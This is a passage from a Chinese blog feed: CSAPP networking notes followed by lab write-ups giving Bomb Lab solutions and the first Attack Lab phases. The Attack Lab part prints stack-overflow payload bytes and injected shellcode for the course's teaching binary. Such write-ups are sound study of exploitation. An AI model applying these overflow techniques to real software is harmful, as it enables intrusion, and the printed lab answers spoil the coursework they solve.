name)以及一种将域名映射到IP地址的机制，便于人们记忆。</li><li>域名集合形成了一个层次结构。<br><img src="/2020/07/csapp/doman_struct.png" alt="img"></li><li>因特网定义了域名集合和IP地址集合之间的映射。在现代，映射通过DNS(Doman Name System，域名系统)维护。</li></ul><h4 id="3-因特网连接">3. 因特网连接</h4><ul><li>因特网客户端和服务端通过在<em>连接</em>上发送和接收字节流来通信。连接是<strong>点对点、全双工、可靠</strong>的。</li><li>一个<strong>套接字</strong>是连接的一个端点。每个套接字都有相应的<strong>套接字地址</strong>，由一个因特网地址和一个16位的<em>整数端口</em>组成，用“地址:端口”表示。</li><li>当客户端发起连接请求时，客户端套接字地址中的端口是由内核自动分配的，称为<strong>临时端口</strong>(ephemeral port)。但服务器套接字地址中的端口通常是某个<strong>知名端口</strong>，与服务相对应。<blockquote><p>例如Web服务的80端口，FTF服务的20端口。</p></blockquote></li><li>一个连接是由两端的套接字地址唯一确定。这对套接字地址叫做<strong>套接字对</strong>(socket pair)，由下列元组表示：<code>(cliaddr:cliport, servaddr:servport)</code></li></ul><h3 id="3-套接字接口">3) 套接字接口</h3><ul><li><p><strong>套接字接口</strong>(socket interface)是一组函数，它们和Unix I/O 函数结合，用以创建网络应用。</p></li><li><p>以下是一个典型的客户端-服务器事务的上下文中的套接字接口概述。<br><img src="/2020/07/csapp/socket_concept_pic.png" alt="img"></p></li><li><p>套接字地址结构</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* IP socket address structure */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sockaddr_in</span>&#123;</span><br><span class="line">  <span class="type">uint16_t</span>      sin_family;   <span class="comment">/* Protocol family (always AF_INET) */</span></span><br><span class="line">  <span class="type">uint16_t</span>      sin_port;     <span class="comment">/* Port number in network byte order */</span></span><br><span class="line">  <span class="type">uint16_t</span>      sin_addr;     <span class="comment">/* IP address in network byte order */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> sin_zero[<span class="number">8</span>];  <span class="comment">/* Pad to sizeof(struct sockaddr) */</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/* Generic socket address structure (for connect, bind, and accept) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sockaddr</span>&#123;</span><br><span class="line">  <span class="type">uint16_t</span>  sa_family;    <span class="comment">/* Protocol family */</span></span><br><span class="line">  <span class="type">char</span>      sa_data[<span class="number">14</span>];  <span class="comment">/* Address data */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>默认情况下，内核会认为<code>socket</code>函数创建的描述符对应于<strong>主动套接字</strong>(active socket)。<br><code>listen</code>函数将sockfd从一个主动套接字转化为一个<strong>监听套接字</strong>(listening socket)，该套接字可以接收来自客户端的请求。<br><code>accept</code>函数会返回一个<strong>已连接描述符</strong>(connected socket)。（套接字和描述符在这里都指代socket）</p><blockquote><p>注意区分开<strong>监听描述符</strong>和<strong>已连接描述符</strong>。<br>1.监听描述符作为客户端连接请求的一个端点，通常被创建一次，并存在于服务器的整个生命周期。<br>2.已连接描述符是客户端和服务器之间已经建立起的连接的一个端点。服务器每次接收连接请求时都会创建一次，它只存在于服务器为一个客户端服务的过程。<br><img src="/2020/07/csapp/connfdOrlistenfg.png" alt="img"><br><strong>监听描述符</strong>和<strong>已连接描述符</strong>概念的区分可以方便并发服务器的建立。</p></blockquote></li><li><p>程序可以使用<code>socket</code>、<code>connect</code>、<code>bind</code>、<code>listen</code>、<code>accept</code>函数等等来建立连接。</p></li></ul><h2 id="十二-并发编程">十二. 并发编程</h2><ul><li>在访问一块共享变量时，并发程序需要对该变量进行上锁，以免产生不必要的条件竞争。</li><li>并发编程一定要避免死锁<br><img src="/2020/07/csapp/deadLockPic.png" alt="img"></li></ul><blockquote><p>其余暂略，待学习操作系统时再学并发</p></blockquote>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里存放着一点笔者阅读CSAPP所记录的笔记&lt;/li&gt;
&lt;li&gt;由于CSAPP内容众多，这里只记录了一些笔者学习的主要点&lt;/li&gt;
&lt;li&gt;根据笔者的进度，持续更新。单次更新随缘记录。&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="CSAPP" scheme="https://kiprey.github.io/tags/CSAPP/"/>
    
    <category term="计算机基础" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9F%BA%E7%A1%80/"/>
    
  </entry>
  
  <entry>
    <title>CSAPP Lab WriteUp</title>
    <link href="https://kiprey.github.io/2020/07/csapp-lab-writeup/"/>
    <id>https://kiprey.github.io/2020/07/csapp-lab-writeup/</id>
    <published>2020-07-22T06:53:29.000Z</published>
    <updated>2025-11-24T03:59:39.926Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里会存放一些CSAPP Lab的WriteUp，以及一点心得</li><li>相关代码存放于 <a href="https://github.com/Kiprey/Skr_Learning/tree/master/week9-19/CSAPP-Lab">github</a></li></ul><span id="more"></span><ul><li>内容较多，请使用右边的导航栏定向跳转。</li></ul><h2 id="1-Data-Lab">1. Data Lab</h2><ul><li>lab目录下，终端键入<code>make all</code>即可编译代码</li><li>我们所要做的就是实现文件<code>bits.c</code>中的每个函数的功能。实现功能时不同函数会有不同的限制，例如不能使用运算符<code>!</code>等等。</li><li>键入<code>./btest</code>以测试文件<code>bits.c</code>中的函数</li><li>键入<code>./dlc bits.c</code>以检查文件<code>bits.c</code>中的函数是否使用了被限制的运算符。如果一切正常，则不输出任何信息。</li><li>键入<code>./ishow &lt;intNum&gt;</code>或<code>./fshow &lt;floatNum&gt;</code>以查看传入十六进制的详细信息</li><li>笔者实现的源码存放于<a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/1.%20Data%20Lab/bits.c">github</a><blockquote><p>Write Up全部以注释的形式写入代码中，方便阅读与理解</p></blockquote></li></ul><h2 id="2-Bomb-Lab">2. Bomb Lab</h2><ul><li>Bomb Lab是一个类似于拆炸弹的实验，需要我们通过反汇编进行逆向分析，找出各个通关phases</li><li>阅读<code>bomb.c</code>代码，注意到程序可以打开某个文件，并将其作为输入的来源。<br>所以我们可以建立一个文件并将找到的phases存至其中，以避免重复的输入</li><li>如果对gdb不太熟练，可以查阅<a href="/2020/04/gdb_command/">gdb常用命令</a></li><li>键入<code>gdb bomb</code>，在main函数初始位置下断点，并键入<code>run input.txt</code>以启动调试。<blockquote><p><code>input.txt</code>是传给bomb的参数（输入文件的名称）</p></blockquote></li><li>输入phases时，随意输入一个容易辨别的字符串，例如<code>1122333</code><blockquote><p>需要注意的是，<code>read_line</code>函数会将每一行的最后一个字符（通常是<code>\n</code>）替换为<code>\0</code>， 如果程序的最后一个字符并非<code>\n</code>等无效字符，则phases的最后一个字符会被清除。避免该问题最有效的办法就是将输入文件中的每一行phases末尾增加一个换行符。</p></blockquote></li></ul><h3 id="1-phases-1">1) phases_1</h3><p>单步进入<code>phase_1</code>函数。程序会通过<code>string_no_equal</code>函数判断输入的字符串是否与特定字符串相等，如果不相等则炸弹爆炸。<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_1.png" alt="img"><br>由此可得出<code>phases1</code>为<code>Border relations with Canada have never been better.</code>(勿漏句末<em>点号</em>)</p><h3 id="2-phases-2">2) phases_2</h3><p><code>phases_2</code>函数中，首先会调用<code>read_six_numbers</code>函数，从刚刚的一行输入中读取6个数字, 并判断<code>a == 1 ?</code>，<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_2_1.png" alt="img"></p><blockquote><p>为了简化说明，我们将输入的6个数分别取名为<strong>a, b, c, d, e, f</strong>。<br>将<strong>a是否等于b</strong>命名为<code>a = b ?</code></p></blockquote><p>之后循环判断  <strong>2 * 当前遍历到的数 == 下一个遍历到的数 ?</strong><br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_2_2.png" alt="img"><br>即判断输入的6个数是否是<strong>以2为公比的非零等比数列</strong>，如果所有条件都满足则通过此关卡。由此可得出<code>phases2</code>可以是<code>1 2 4 8 16 32</code></p><h3 id="3-phases-3">3) phases_3</h3><p><code>phases_3</code>函数中，程序会先将读入的一行字符串转化为两个数字（如果转换的数字个数不为2则爆炸）然后判断第一个数<code>a &lt; 7 ?</code>。第二个数的值取决于第一个数。如果第二个数与第一个数所指定的常数相等，则通过此关卡。<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_3.png" alt="img"><br>由此我们可以得到<code>phases3</code>： <code>7 327</code>（答案不唯一）</p><h3 id="4-phases-4">4) phases_4</h3><p><code>phases_4</code>函数与<code>phases_3</code>函数类似，都会读入两个数字。该函数会执行以下流程</p><ul><li>判断输入的第一个数字<code>a</code>是否小于等于14（注意数字<code>a</code>是无符号整数）</li><li>执行函数<code>func4(a, 0, 14)</code>，并判断其返回值是否等于0</li><li>判断输入的第二个数<code>b</code>是否等于0</li></ul><p><img src="/2020/07/csapp-lab-writeup/bomblab_phases_4.png" alt="img"><br><code>func4</code>函数比较特殊，该函数会在内部递归调用自身。通过分析其反汇编代码，得到以下C代码</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">func4</span><span class="params">(<span class="type">int</span> arg0, <span class="type">int</span> arg1, <span class="type">int</span> arg2)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> tmp1 = arg2 - arg1;</span><br><span class="line">    <span class="comment">// 逻辑右移获取符号位</span></span><br><span class="line">    <span class="type">int</span> tmp2 = (tmp1 &gt;&gt; <span class="number">31</span>) + tmp1;</span><br><span class="line">    tmp2 &gt;&gt;= <span class="number">1</span>; <span class="comment">// 算术右移</span></span><br><span class="line">    <span class="type">int</span> tmp3 = tmp2 + arg1;</span><br><span class="line">    <span class="keyword">if</span> (tmp3 &lt;= arg0)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (tmp3 &gt;= arg0) <span class="comment">// 实际上这里就是tmp3 == arg0</span></span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="keyword">return</span> <span class="number">2</span> * <span class="built_in">func4</span>(arg0, tmp3 + <span class="number">1</span>, arg2) + <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">2</span> * <span class="built_in">func4</span>(arg0, arg1, tmp3 - <span class="number">1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>通过暴力枚举，可以得到<code>func(x, 0, 14) == 0</code>的4个解，分别为0, 1, 3, 7。<br>故，<code>phases4</code>可以是<code>0 0</code>(答案不唯一)</p><h3 id="5-phases-5">5) phases_5</h3><p><code>phases_5</code>函数中，程序会</p><ol><li>判断读入的字符串长度是否等于6</li><li>循环6次，以<code>ch &amp; 0xf</code>为索引，每次在全局字符串<strong>maduiersnfotvbyl</strong>中获取一个字符<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_5.png" alt="img"></li><li>待6次循环结束后，将选出的字符串与字符串<code>flyers</code>相比较，如果相同，则通过当前关卡</li></ol><p>故根据上面的信息可得，<code>phases_5</code>: <code>ionefg</code> / <code>IONEFG</code> （答案不为一）</p><h3 id="6-phases-6">6) phases_6</h3><p>函数<code>phases_6</code>提高了难度。为了便于说明，我们为输入的6个数字命名为 <strong>a1, a2, a3, a4, a5, a6</strong>。</p><ul><li><p>第一部分是一个嵌套循环。<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_1.png" alt="img"><br>为便于理解，将该嵌套循环的汇编代码翻译为如下C代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 6个输入的数字</span></span><br><span class="line"><span class="type">int</span> inputNum[<span class="number">6</span>];</span><br><span class="line"><span class="type">int</span>* r13d = inputNum;</span><br><span class="line"><span class="type">int</span> r12d = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">while</span>(<span class="literal">true</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span>* rbp = r13d;</span><br><span class="line">  <span class="comment">// 所输入的数必须大于1，小于6</span></span><br><span class="line">  <span class="keyword">if</span>(*rbp - <span class="number">1</span> &lt;= <span class="number">5</span>) <span class="comment">// 无符号比较</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">// 如果遍历完成，则跳出循环</span></span><br><span class="line">    <span class="keyword">if</span>(++r12d == <span class="number">6</span>)</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="type">int</span> ebx = r12d;</span><br><span class="line">    <span class="comment">// 循环检测字符是否相等</span></span><br><span class="line">    <span class="keyword">do</span>&#123;</span><br><span class="line">      <span class="keyword">if</span>(inputNum[ebx] == rbp)</span><br><span class="line">        <span class="built_in">explode_bomb</span>();</span><br><span class="line">      ebx++;</span><br><span class="line">    &#125;<span class="keyword">while</span>(ebx &lt;= <span class="number">5</span>);</span><br><span class="line">    <span class="comment">// 指向下一个数组位置</span></span><br><span class="line">    r13d++;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="built_in">explode_bomb</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这个代码比较简单，因为它实际上就是遍历检测所输入的6个数是否出现重复，如果存在重复则爆炸。同时还将输入的数字限制在了1-6中(注意其中的数字是 <strong>无符号</strong> 整数)</p></li><li><p>第二部分是一个简单的循环。这个循环将输入的六个数字设置为 <code>inputNum[i] = 7 - inputNum[i]</code><br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_2.png" alt="img"></p></li><li><p>第三部分同样是一个循环，为便于说明，将该部分的汇编代码转换为如下的C代码：</p><blockquote><p>为了便于直观，调换了部分代码的顺序，不影响最终结果</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> rsi = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span>(<span class="literal">true</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> ecx = inputNum[rsi];</span><br><span class="line">  <span class="keyword">if</span>(inputNum[rsi] &lt;= <span class="number">1</span>)</span><br><span class="line">    <span class="comment">// node是链表上的一个结点。该节点由 int与int* 组成</span></span><br><span class="line">    list[rsi] = &amp;node1;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="type">int</span> eax = <span class="number">1</span>;</span><br><span class="line">    <span class="type">int</span> rdx = &amp;node1;</span><br><span class="line">    <span class="keyword">do</span>&#123;</span><br><span class="line">      rdx = rdx-&gt;next;</span><br><span class="line">      eax++;</span><br><span class="line">    &#125;<span class="keyword">while</span>(eax == ecx);</span><br><span class="line">    <span class="comment">// 此时rdx == &amp;node6</span></span><br><span class="line">    list[rsi] = rdx;</span><br><span class="line">  &#125;</span><br><span class="line">  rsi++;</span><br><span class="line">  <span class="keyword">if</span>(rsi == <span class="number">6</span>)</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>程序遍历之前转换的值，并将其作为索引，来获取链表上特定位置的地址，并将其存入栈中。</p></li><li><p>第四部分还是一个万年不变的循环。<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_3.png" alt="img"><br>这个循环会改变原来的链表顺序，并将其设置为栈上链表的顺序。其代码如下</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">rcx = list[<span class="number">0</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="type">int</span>* rax = &amp;list[<span class="number">1</span>]; rax != &amp;list[<span class="number">5</span>]; rax++)</span><br><span class="line">&#123;</span><br><span class="line">  rcx-&gt;address = *rax;</span><br><span class="line">  rcx = *rax;</span><br><span class="line">&#125;</span><br><span class="line">rcx-&gt;address = <span class="literal">NULL</span>;</span><br></pre></td></tr></table></figure></li><li><p>第五部分是一个校验循环。这个循环会使用新顺序来获取链表上的值并判断其关系，其中链表上的值必须逐级递减，否则炸弹爆炸。<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_4.png" alt="img"><br>由于链表上的值顺序为 <strong>node3 &gt; node4 &gt; node5 &gt; node6 &gt; node1 &gt; node2</strong><br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_5.png" alt="img"><br>故我们最后终于可以得出<code>phases6</code>: <code>4 3 2 1 6 5</code></p></li></ul><h3 id="7-secret-phase">7) secret_phase</h3><ul><li><p>当6个关卡都通过之后，我们跟进<code>phase_defused</code>，发现还有隐藏关卡。<br>在进入隐藏关卡前，我们需要先通过两个判断。<br><img src="/2020/07/csapp-lab-writeup/phases_defuse_1.png" alt="img"><br>将第一个判断的<code>sscanf</code>操作的字符串所在内存输出，可以看出，该字符串是<code>phases_4</code>关卡的输入<br>函数参数：<br><img src="/2020/07/csapp-lab-writeup/phases_defuse_2.png" alt="img"><br>内部内存的值：<br><img src="/2020/07/csapp-lab-writeup/phases_defuse_3.png" alt="img"><br>同时，第二个判断所对比的字符串为<br><img src="/2020/07/csapp-lab-writeup/phases_defuse_4.png" alt="img"><br>故我们可以在<code>phases_4</code>关卡的输入后追加字符串<code>DrEvil</code>来进入隐藏关卡<code>secret_phase</code>。</p></li><li><p><code>secret_phase</code>关卡中会先读入一个数字<code>inputNum</code>，并满足该条件<code>(inputNum - 1）&lt;= 0x3e8(1000)</code>, 即输入的数字必须小于等于1001。<br>之后执行函数<code>fun7(&amp;n1, inputNum)</code>。当该函数的返回值为2时则通过此关卡。<br>全局变量<code>n1</code>是一个树节点，其所有相关的树节点如下所示<br><img src="/2020/07/csapp-lab-writeup/secret_phase_1.png" alt="img"><br>为便于理解，将函数<code>fun7</code>的汇编代码转为C代码：</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">fun7</span><span class="params">(treeNode* node, <span class="type">int</span> num)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(node == <span class="literal">NULL</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span>(node-&gt;val &lt;= num)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span>(node-&gt;Val == num)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">2</span> * <span class="built_in">fun7</span>(node-&gt;right, num) + <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">      <span class="keyword">return</span> <span class="number">2</span> * <span class="built_in">fun7</span>(node-&gt;left, num);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>易知，若需<code>fun7(&amp;n1, inputNum) == 2</code>, 则要进行如下操作</p><ul><li>调用<strong>fun7(&amp;n1, inputNum)</strong>。此时 <strong>n1.val == 0x24</strong></li><li>递归向下调用<strong>fun7(arg.left, inputNum)</strong>, 此时 <strong>arg.val == 0x8</strong></li><li>再次递归向下调用<strong>fun7(newArg.right, inputNum)</strong>, 此时 <strong>newArg.val == 0x16 == 22</strong></li><li>在这最后调用的 <strong>fun7(newArg.right, inputNum)</strong> 中返回0<br>综上所述，本次输入的数字应为<code>22</code></li></ul></li><li><p>最后的输入文本为</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Border relations with Canada have never been better.</span><br><span class="line">1 2 4 8 16 32</span><br><span class="line">7 327</span><br><span class="line">0 0 DrEvil</span><br><span class="line">ionefg</span><br><span class="line">4 3 2 1 6 5</span><br><span class="line">22</span><br></pre></td></tr></table></figure><p>通关截图<br><img src="/2020/07/csapp-lab-writeup/success.png" alt="img"></p></li></ul><h2 id="3-Attack-Lab">3. Attack Lab</h2><ul><li>Attack Lab要求进行五次的攻击实验，其中所使用的攻击方式是<strong>代码注入</strong>和<strong>ROP</strong></li></ul><h3 id="1-Code-Injection">1) Code Injection</h3><ul><li><p><code>ctarget</code>文件：该文件用于代码注入实验。</p></li><li><p>在代码注入实验中，通过使缓冲区溢出、注入攻击代码来完成特殊目的。</p></li><li><p>在<code>stable_stable_launch</code>函数中有个很有意思的操作。程序会mmap出一块RWX的内存，并将栈指针迁移到这块固定地址的内存上。这一步方便了后续的代码执行操作，否则原始栈上数据是不可执行的(NX)<br><img src="/2020/07/csapp-lab-writeup/ctarget_1.png" alt="img"></p></li><li><p>代码注入脆弱点位于<code>getbuf</code>函数中，该函数会调用<code>gets</code>函数，这可能会造成溢出。<br>在该函数中，字符串所存入的地址为<code>0x5561dc78</code>，当前函数的返回地址存储于<code>0x5561dca0</code>，其相对偏移为<code>40</code><br><img src="/2020/07/csapp-lab-writeup/ctarget_2.png" alt="img"></p></li><li><p><strong>phase1</strong></p><ul><li><p>该关卡只要求将程序的控制流返回至<code>touch1</code>函数中即可，其中该函数的地址为<code>0x4017c0</code></p></li><li><p>这里需要利用栈溢出来修改栈上的<strong>函数返回地址</strong></p></li><li><p>故最终的输入文件如下</p><blockquote><p>注意文件中的<code>00</code>不可省略，因为这是函数地址的一部分（64位中指针大小为8字节）<br>注意<strong>小端序</strong></p></blockquote>  <figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">c0 17 40 00 00 00 00 00</span><br></pre></td></tr></table></figure><p>通过当前关卡的截图如下</p><p><img src="/2020/07/csapp-lab-writeup/ctarget_touch1.png" alt="img"></p></li></ul></li><li><p><strong>phase2</strong></p><ul><li><p><code>touch2</code>函数与<code>touch1</code>不太一样，它多了一项寄存器的比较。只有当<code>%edx == &lt;cookie&gt;</code>时才能通过当前关卡。<br><img src="/2020/07/csapp-lab-writeup/ctarget_3.png" alt="img"></p></li><li><p>此时我们就需要在栈上布下代码，使控制流在<code>getBuf</code>函数返回时<strong>跳转至栈上的代码</strong>，<strong>修改%edx寄存器</strong>并最终<strong>跳转回<code>touch2</code>函数</strong>。这部分代码为</p><blockquote><p><code>touch2</code>函数的地址为<code>0x4017ec</code></p></blockquote>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">movq</span> <span class="number">$0</span>x59b997fa, %rdi # <span class="number">0x59b997fa</span>是个人cookie</span><br><span class="line"><span class="keyword">push</span> <span class="number">$0</span>x4017ec</span><br><span class="line"><span class="keyword">ret</span></span><br></pre></td></tr></table></figure><p>之后执行以下指令，将其编译为机器码并显示详细信息。</p>  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -c asm.s -o asm.o &amp;&amp; objdump -d asm.o</span><br></pre></td></tr></table></figure><p><img src="/2020/07/csapp-lab-writeup/ctarget_asm_1.png" alt="img"></p></li><li><p>最后我们的输入数据如下</p>  <figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 fa 97 b9 59 68</span><br><span class="line">ec 17 40 00 c3 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">78 dc 61 55 00 00 00 00  </span><br></pre></td></tr></table></figure><p>通过当前关卡的截图如下<br><img src="/2020/07/csapp-lab-writeup/ctarget_touch2.png" alt="img"></p></li></ul></li><li><p><strong>phase3</strong></p><ul><li><p><code>touch3</code>函数与<code>touch2</code>函数类似，都存在着一个比较的判断，通过该判断即可通过当前关卡。<br>所不同的是，<code>touch3</code>函数中使用另一个函数<code>hexmatch</code>进行判断。<code>hexmatch</code>传入的参数分别为<code>&amp;cookie</code>与<code>touch3</code>的第一个参数<code>%rdi</code>。<br><img src="/2020/07/csapp-lab-writeup/ctarget_3_2.png" alt="img"></p></li><li><p>分析<code>hexmatch</code>函数，可以发现，当栈溢出时刻的<code>%rdi == 0x5561dc13</code>时，即可通过当前关卡。<br><img src="/2020/07/csapp-lab-writeup/ctarget_3_1.png" alt="img"></p></li><li><p>由于该关卡修改的寄存器与第二关的寄存器一致，所以可以直接修改第二关的输入数据，即可得到当前关卡的输入数据。</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 13 dc 61 55 68</span><br><span class="line">fa 18 40 00 c3 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">78 dc 61 55 00 00 00 00</span><br></pre></td></tr></table></figure><p><img src="/2020/07/csapp-lab-writeup/ctarget_3_3.png" alt="img"></p></li><li><p><strong>注意!</strong> 这个解实际上是 <strong>非预期解</strong> 。按照正常的逻辑，用于存放cookie字符串的内存地址应该是随机的。</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Compare string to hex represention of unsigned value */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">hexmatch</span><span class="params">(<span class="type">unsigned</span> val, <span class="type">char</span> *sval)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">char</span> cbuf[<span class="number">110</span>];</span><br><span class="line">  <span class="comment">/* Make position of check string unpredictable */</span></span><br><span class="line">  <span class="type">char</span> *s = cbuf + <span class="built_in">random</span>() % <span class="number">100</span>;</span><br><span class="line">  <span class="built_in">sprintf</span>(s, <span class="string">&quot;%.8x&quot;</span>, val);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">strncmp</span>(sval, s, <span class="number">9</span>) == <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但由于程序内部并没有初始化随机数种子，所以生成的随机数始终是固定的，进而导致用于存放cookie字符串的内存地址一直是同一个地址。</p></li></ul></li></ul><h3 id="2-ROP">2) 